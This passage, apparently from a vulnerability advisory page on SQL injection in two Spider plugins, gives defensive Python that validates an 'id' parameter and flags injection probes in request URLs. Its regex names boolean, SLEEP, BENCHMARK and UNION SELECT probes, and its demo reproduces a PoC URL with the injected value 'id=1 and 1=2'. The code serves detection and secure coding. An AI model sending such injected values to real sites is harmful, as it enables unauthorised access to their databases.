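Both Spider advisories on this page (Form Maker and Spider Facebook) come down to an "id" query parameter passed straight from the request into SQL, as the PHP excerpt above shows. As an added example, not code from either plugin, the following Python does two things a defender wants here: it validates "id" the way the plugin should have (a non-negative integer, else the code's own default of 0 or a rejection), and it flags requests to the two endpoints named on this page whose "id" value carries the probes seen in the PoCs ("1 and 1=2", "1 AND SLEEP(5)"). Function names and the heuristic pattern are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs


def parse_id_param(query):
    """What the vulnerable code should have done with $_GET['id']: accept only a
    non-negative integer; fall back to 0 when absent (mirroring the plugin's
    own `else $id = 0`); reject anything else instead of passing it to SQL."""
    values = parse_qs(query, keep_blank_values=True).get("id", [])
    if not values:
        return 0
    raw = values[0].strip()
    if re.fullmatch(r"\d{1,10}", raw):
        return int(raw)
    raise ValueError("non-numeric id rejected: %r" % raw)


# Indicators of the probes shown on this page (constructed heuristic, not a
# complete SQLi signature set).
SQLI_HINTS = re.compile(r"""(?ix)
    \b(?:and|or)\s+\d+\s*=\s*\d+       # boolean probe such as "1 and 1=2"
  | \bsleep\s*\(\s*\d+\s*\)            # time-based blind probe such as "SLEEP(5)"
  | \bbenchmark\s*\(
  | \bunion\s+(?:all\s+)?select\b
""")

# Query-string markers of the two endpoints named in these advisories.
VULN_ENDPOINTS = ("option=com_formmaker", "page=Spider_Facebook_manage")


def flag_request(url):
    """True when a request targets one of the two endpoints with a suspicious
    "id" value; usable over an access log or as a WAF-style rule."""
    parts = urlsplit(url)
    if not any(marker in parts.query for marker in VULN_ENDPOINTS):
        return False
    for value in parse_qs(parts.query, keep_blank_values=True).get("id", []):
        if SQLI_HINTS.search(value):
            return True
    return False


if __name__ == "__main__":
    # The Spider Facebook PoC URL from above, then a benign Form Maker request.
    print(flag_request("http://10.0.0.67/wordpress/wp-admin/admin.php"
                       "?page=Spider_Facebook_manage&task=Spider_Facebook_edit&id=1 and 1=2"))
    print(flag_request("http://localhost/index.php?option=com_formmaker&view=formmaker&id=7"))
```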
